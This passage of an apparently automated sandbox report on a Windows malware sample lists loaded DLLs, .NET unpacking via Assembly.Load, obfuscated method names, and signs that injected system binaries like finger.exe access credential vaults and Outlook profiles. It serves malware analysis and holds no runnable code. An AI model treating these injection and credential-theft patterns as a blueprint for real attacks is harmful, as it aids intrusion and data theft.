                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\MalPRrQeWEUjxNEYPLkWdCuSzAIOwzdgNEIZeJTUBphatQyWtkWxHRKmsimM\DzuG1v7KGGzqI4w.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: oss4CtI8oz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: oss4CtI8oz.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: oss4CtI8oz.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: finger.pdb source: RegSvcs.exe, 00000004.00000002.1067580563.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000006.00000002.3338837385.000000000105E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000004.00000002.1068183881.0000000001320000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3340212039.0000000003150000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1067736968.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1076390461.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3340212039.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000004.00000002.1068183881.0000000001320000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000007.00000002.3340212039.0000000003150000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1067736968.0000000002DF0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000003.1076390461.0000000002FAA000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000007.00000002.3340212039.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: LouH.pdb source: oss4CtI8oz.exe
                Source: Binary string: LouH.pdbSHA256HB source: oss4CtI8oz.exe
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: DzuG1v7KGGzqI4w.exe, 00000006.00000000.992635700.00000000001EF000.00000002.00000001.01000000.0000000B.sdmp, DzuG1v7KGGzqI4w.exe, 00000009.00000000.1144229567.00000000001EF000.00000002.00000001.01000000.0000000B.sdmp
                Source: Binary string: finger.pdbGCTL source: RegSvcs.exe, 00000004.00000002.1067580563.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, DzuG1v7KGGzqI4w.exe, 00000006.00000002.3338837385.000000000105E000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: oss4CtI8oz.exe, Form3.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                Source: 0.2.oss4CtI8oz.exe.7190000.4.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.oss4CtI8oz.exe.2e1a118.0.raw.unpack, .cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, tnGIQe7bESBeOGbg8N.cs.Net Code: OLq1LroSAm System.Reflection.Assembly.Load(byte[])
                Source: 0.2.oss4CtI8oz.exe.4021a88.3.raw.unpack, tnGIQe7bESBeOGbg8N.cs.Net Code: OLq1LroSAm System.Reflection.Assembly.Load(byte[])
                Source: oss4CtI8oz.exeStatic PE information: 0xCDFF8560 [Sat Jul 8 20:51:44 2079 UTC]
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeCode function: 0_2_072CE4AA pushad ; retf 0_2_072CE4B1
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeCode function: 0_2_07307F90 pushad ; iretd 0_2_07307F91
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeCode function: 0_2_073079B2 push eax; retf 0_2_073079B9
                Source: C:\Users\user\Desktop\oss4CtI8oz.exeCode function: 0_2_07C12EAD push FFFFFF8Bh; iretd 0_2_07C12EAF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004014F0 push FFFFFF89h; retn D8D9h4_2_00401A97
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004014F0 push ebx; retn F2A0h4_2_00401B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0042D963 push edi; iretd 4_2_0042D96C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00407109 push cs; iretd 4_2_0040710B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_004149E2 push edi; retf 4_2_004149E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00406365 push ebx; ret 4_2_00406366
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00403370 push eax; ret 4_2_00403372
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00417E8E push ebx; iretd 4_2_00417E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_00414F55 push 00000079h; retf 4_2_00414F57
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0040D75B push ss; ret 4_2_0040D760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041870B pushad ; retf 4_2_0041870C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0041AF95 push esi; iretd 4_2_0041AF97
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0132225F pushad ; ret 4_2_013227F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013227FA pushad ; ret 4_2_013227F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013509AD push ecx; mov dword ptr [esp], ecx4_2_013509B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0132283D push eax; iretd 4_2_01322858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01329939 push es; iretd 4_2_01329940
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_031809AD push ecx; mov dword ptr [esp], ecx7_2_031809B6
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_00865398 pushad ; retf 7_2_00865399
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0087A5F0 push edi; iretd 7_2_0087A5F9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0086C766 push cs; retf 7_2_0086C77D
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_0085D970 push esp; retf 7_2_0085D9B9
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_00861BE2 push 00000079h; retf 7_2_00861BE4
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_00864B1B push ebx; iretd 7_2_00864B1D
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_00867C22 push esi; iretd 7_2_00867C24
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_00853D96 push cs; iretd 7_2_00853D98
                Source: C:\Windows\SysWOW64\finger.exeCode function: 7_2_00852FF2 push ebx; ret 7_2_00852FF3
                Source: oss4CtI8oz.exeStatic PE information: section name: .text entropy: 7.800864931150451
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, suHcoIe9AHX695RwfE.csHigh entropy of concatenated method names: 'xuT8yOYelr', 'sRk8c7sLgE', 'dBe8uZmdxB', 'cXFupK4ZEL', 'Vq7uzOHnJo', 'pva8YhfYOe', 'QaJ82Jl2KW', 'qUC8JwpMgY', 'Qqf8gLAcoF', 'Hxu81yKUtp'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, bc2a3e31wbBrI9NhD4.csHigh entropy of concatenated method names: 'jLaZm1q7IY', 'pySZVJDJIh', 'uf7ZnqGMsY', 'I9pZaRMuW1', 'AcwZj3AtGT', 'fxlZtXxljg', 'yJ7ZsR7jlv', 'WylZduQe9P', 'JY6ZGLOvtc', 'ckXZpVneOW'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, Wt66Mj4FbmE7Dp00QI.csHigh entropy of concatenated method names: 'ojHcNckI8H', 'CEWcQ79cnh', 'zVhc3ZTwUN', 'FOfc4w5J72', 'TJ4c09b37N', 'zIcck0pv4k', 'iPVcDqxu1r', 'BWEc64T2Sd', 'r4KcwfhAIp', 'B7CcAXyeoE'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, ssZg3f21GuR9AI0O0Kg.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'B6jKwFDdbw', 'FgrKAsx6hu', 'mejKBE3XuQ', 'syaKKw42og', 'qYoKfYoRCt', 'HEOKrmydBO', 'zb9KlX11r3'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, XKf49ytqdC6ZOywZBi.csHigh entropy of concatenated method names: 'iTkDd13xam', 'zYtDpk5GyE', 'IwH6YOPsZL', 'bIs62YCDI3', 'tMGDRvQIZv', 'NAHDvr4y8p', 'reVDHodevn', 'jR0DmLG35R', 'g6jDVf5qFy', 'rbQDnYWMEK'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, tYe48cmWj55j9fqa2v.csHigh entropy of concatenated method names: 'Yuh0EghXIx', 'yuU0vOfeXx', 'ttG0m9uCNk', 'Rc40VVbJEV', 'scM0UNFY2V', 'Wyl0IqpSed', 'cya0ikBL4H', 'DGP0qxMHlS', 'D7a0WjYwp5', 'tU40eDOs6C'
                Source: 0.2.oss4CtI8oz.exe.7340000.5.raw.unpack, N6moQ09V21hKtm2FOi.csHigh entropy of concatenated method names: 'YJL8CIipVS', 'EEH8TDXK7M', 'hXl8L11Jy0', 'Rsn8NysYOl', 'flC85ig5yq', 'WZy8QBYXSu', 'kyn8hMkMuS', 'vML83gRero', 'a6A84oIOeV', 'jU28XQhHIR'
